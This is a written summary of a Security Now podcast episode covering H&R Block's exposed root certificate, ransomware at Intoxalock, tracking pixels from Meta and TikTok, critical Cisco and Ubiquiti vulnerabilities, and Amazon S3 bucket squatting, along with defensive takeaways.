Security Now Episode 1071: "Bucketsquatting" – Meta and TikTok’s Tracking Pixels

Podcast: Security Now (TWiT)
Hosts: Steve Gibson & Micah Sargent (filling in for Leo Laporte)
Date: March 25, 2026

Episode Overview

This episode covers a wide array of recent cybersecurity topics, centering on the fascinating and troubling concept of bucket squatting in Amazon S3 cloud storage—a vulnerability that exposes an alarming supply-chain risk. Other major topics include:

• The serious flaw in H&R Block’s tax software and root certificate handling
• How TikTok and Meta use “tracking pixels” for deep user and business surveillance
• A real-world ransomware incident affecting Intoxalock breathalyzer infrastructure
• Major new vulnerabilities in Cisco and Ubiquiti products (CVSS 10.0)
• Firefox’s new built-in VPN and privacy developments
• Security advice and feedback from listeners

The show dives deep into technical explanations, the implications for organizations and individuals, and practical advice for improving security posture.

Main Topics and Timeline

1. H&R Block’s Dangerous Root Certificate Mishap

[09:48] – [43:52]

Summary:
A security researcher discovered that H&R Block’s Business 2025 tax software installs its own root CA certificate, along with the matching private key (embedded, unprotected, in a DLL), into users' trusted store—and leaves it there even after uninstalling. This massive misstep enables anyone with access to the key to create and sign certificates trusted by affected computers for decades (until 2049), opening doors to MITM attacks, code signing, and user impersonation.

Key Insights:

• Installing a long-lived, unconstrained root CA is a grave security mistake, especially when the private key is shipped with the software.
• "Anyone anywhere in the world can generate their own TLS web certificates or code signing certificates [...] because there's no constraint on the use of this that will be trusted without question by any previous user of H&R Block's tax preparation software." – Steve Gibson [23:05]
• Example exploit: a proof-of-concept site shows your browser will trust a “backdoor” certificate if affected.

Why did they do this?

• Steve reasons the only plausible intention is for local web-server operation (web UIs) via localhost, but even then, it should have been done differently and much more securely.
• H&R Block’s response: “Similar findings have been identified through internal security assessments.” Then, they closed the report as "out of scope.” [39:40]
• Proper solution: A root CA should be generated per-installation, private key never persisted, and tightly scoped just for localhost.

Memorable Quotes:

• "Doing that is the height of hubris and irresponsibility." – Steve Gibson [18:29]
• “Please always audit your trusted root CA store. You never know what cruft something has left behind.” – Steve Gibson [16:25]
• "There can be no doubt that the use of their tax preparation software leaves an uninvited, unwanted, unconstrained root certificate with a 23 year lifetime..." [41:13]

2. Ransomware Shuts Down Intoxalock Breathalyzer Infrastructure

[58:10] – [65:55]

Summary:
Intoxalock, a company providing court-mandated in-car breathalyzers, suffered a significant ransomware attack. Their calibration system went offline for ten days, leaving many drivers unable to use their vehicles when the mandatory recalibration window expired.

Key Insights:

• Outage impacts “real life” as well as compliance with court orders, causing severe disruption.
• Sensitive data exfiltration is also likely: “That’s not the sort of data anyone would wish to have floating around the Internet…I would argue it makes a Social Security number look tame by comparison.” – Steve Gibson [62:32]

Memorable Moment:

• Goosebumps moment as Micah realizes the blackmail/extortion potential in exposing lists of court-mandated breathalyzer users. [63:04]

3. Firefox 149 Launches Free, Built-in VPN

[65:55] – [70:33]

Summary:
Firefox’s new version (149, released March 24th) incorporates a free VPN feature with 50GB/mo for users in select countries, serving as a privacy measure to prevent IP-based tracking and content restrictions.

Key Insights:

• Mozilla’s move may be a response to declining market share (down to 4.2% desktop), and legislative pushback against anonymous/VPN usage for bypassing restrictions is brewing.

4. Tracking Pixels: The Dark Reality of Web Surveillance by TikTok & Meta

[73:14] – [90:02]

Summary:
JSCrambler researchers reveal that modern tracking pixels from TikTok and Meta go far beyond advertising attribution:

• They exfiltrate emails, phone numbers, addresses, checkout actions, cart contents, even payment data—often before or despite users’ consent choices.
• Hashed identifiers are easily reversible, so data is not truly anonymized.
• “It’s total intrusion for Meta's benefit…They do it simply because they can.” – Steve Gibson [81:53]

Key Insights:

• Data captured includes full names, addresses, parts of credit card numbers – sometimes in cleartext.
• “Calling it a ‘pixel’ makes it cute, but it’s really a spying suite.” – Steve Gibson [88:19]
• Merchants may be unwitting accomplices due to integrations (e.g., Shopify); much of this exceeds what’s documented or intended.
• These “pixels” put merchants at risk for GDPR/CCPA violations and outright competitive espionage.

Notable Quotes:

• “Merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels…” [85:18]
• “Both TikTok and Meta’s pixel code can begin transmitting data before the website’s consent management system has time to block it.” [86:41]
• “The pixels implement are not passive measurement tools. They are instead active data collection systems…” [88:19]

5. Russia’s Messaging Ban Strangles Business

[90:02] – [91:40]

Summary:
Russian private sector pleads for the government to reinstate Telegram, WhatsApp, and other messaging apps, as bans disrupt business communications with foreign partners. Russia’s goals of “national security” clash with operational reality.

6. Crypto Phishing & the Perils of Wallet “Connectivity”

[91:40] – [93:29]

Summary:
GitHub developers are targeted by phishing through fake Open Claw token bounties. Victims are asked to connect their wallets to malicious sites, leading to instant theft.

Advice:

• Never connect your main wallet to untrusted services; use a separate, low-balance wallet for experiments.
• “Anyone who considers themselves savvy enough to be a developer would have a difficult time extracting much sympathy from me…” – Steve Gibson [93:29]

7. Cisco & Ubiquiti: New Critical Vulnerabilities (CVSS 10.0)

[93:29] – [116:17]

Summary: Two consecutive new “Critical 10.0” vulnerabilities:

• Cisco “Secure Firewall Management Center” allows unauthenticated remote code execution as root (CVE-2026-20131); exploited by Interlock ransomware for more than 5 weeks before disclosure.
• Ubiquiti Unifi products suffer a severe path traversal bug—patches urgently required.

Amazon Threat Intelligence Investigation
Discovered Interlock ransomware exploiting Cisco’s zero-day for weeks, with a full attack toolkit found due to attacker misconfig—a rare win for defenders.

Key Insights:

• “Defense in depth” is essential. Reliance on patch cycles alone is not enough.
• “Anytime any management portal is exposed to the global Internet…the security of the organization now rests on that single point which could fail.” – Steve Gibson [110:40]
• Limiting access by IP/geography (least privilege) is a must—“It is a privilege if someone in China has the opportunity to guess your password. Why have you given them that?” – Steve Gibson [115:13]

8. Listener Feedback and Security Culture

[116:17] – [128:27]

Varied observations from the audience:

• Analog skills (clocks, cursive) and coding: will they too become an “arcane art” in the age of AI?
• Social engineering “click-fix” attacks: emails directing users to open a Windows Run prompt and paste PowerShell (malicious) code [120:34]
• Cloud code-signing raises the risk of credential compromise vs. locally managed HSMs.
• Craftsmanship in coding: analogy to hand-making fishing lures—some value in slow, quality, hands-on work.

9. Bucket Squatting: The Cloud’s Forgotten Supply Chain Nightmare

[131:21] – [163:03]

Key Segment:

• Watchtower Labs (Feb 2025) documented registration of 153 abandoned Amazon S3 bucket names previously used by software, governments, and businesses.
• Over 8 million requests for updates, binaries, VM images, and config files streamed in over two months—including from US military, NASA, banks, labs, and Fortune 500s.
• Since S3 bucket names are globally unique and can be recycled, a deleted bucket's name can be claimed by anyone, creating a silent but massive supply-chain risk. All automated updaters, scripts, and appliances continuing to reach for those old URLs can be maliciously serviced. “Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious...” – Watchtower Labs (quoted at [137:43])

Steve’s Analysis:

• This is not a “bug” but a design flaw—Amazon’s flat global namespace and recycling policy are fundamentally unsafe for this usage.
• Solution: Bucket names should never be recycled. New “account regional namespaces” (announced March 2026) add per-account unique suffixes, preventing future squatting—but do not fix legacy buckets.
• “Your security needs security.”
• “When users are given a choice, they’ll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else.” – Steve Gibson [152:07]

Notable Quotes & Moments

• “Your security needs security.” (Steve Gibson) [116:17]
• “It's never safe to depend entirely upon any single security control.” (Amazon’s threat team, quoted in episode) [110:40]
• “That is far more terrifying than I thought it was going to be based on the name...” (Micah Sargent, on bucket squatting) [163:03]
• “Calling it a pixel makes it cute, but it’s really a spying suite.” (Steve Gibson, on Meta/TikTok pixels) [88:19]
• “There can be no doubt the use of their tax preparation software leaves an uninvited, unwanted, unconstrained root certificate with a 23 year lifetime.” (Steve Gibson, on H&R Block issue) [41:13]

Practical Takeaways

• Audit your root CA list—apps may silently add dangerous trust anchors.
• Never connect your main crypto wallet to unknown web services.
• Patch high-profile, Internet-facing devices immediately—and add “defense in depth” (network filtering, least privilege, MFA, etc.).
• For developers/admins: Do not build services that rely on persistent, reusable cloud storage names without ensuring unique, non-recyclable identifiers.
• Reject uncritical trust in large platforms (Meta/TikTok)—read what pixels/scripts you embed actually do.
• Even “fully patched” doesn’t mean “immune”—always layer your defenses.

Overall Tone

The episode is characteristically technical, clear-eyed, and sometimes incredulous—equal parts “what were they thinking?” and practical advice. Steve and Micah’s chemistry brings levity and clarity to often-absurd real-world security missteps.

Essential Timestamps

• H&R Block CA debacle: [09:48] – [43:52]
• Intoxalock ransomware: [58:10]
• Firefox VPN: [65:55]
• Meta/TikTok tracking pixels: [73:14]
• Bucket squatting: [131:21] – [163:03]

Conclusion

A jam-packed episode not only illuminating major current vulnerabilities and privacy abuses, but also providing a masterclass in what to do—and not do—to secure infrastructure and protect user trust. The “bucket squatting” example is a vivid reminder that security is as much about good, scalable architectural decisions as patching bugs; that legacy design can have decades-long consequences; and that attackers (and well-meaning researchers) are always peering through every crack that gets left open.

Security really does need security.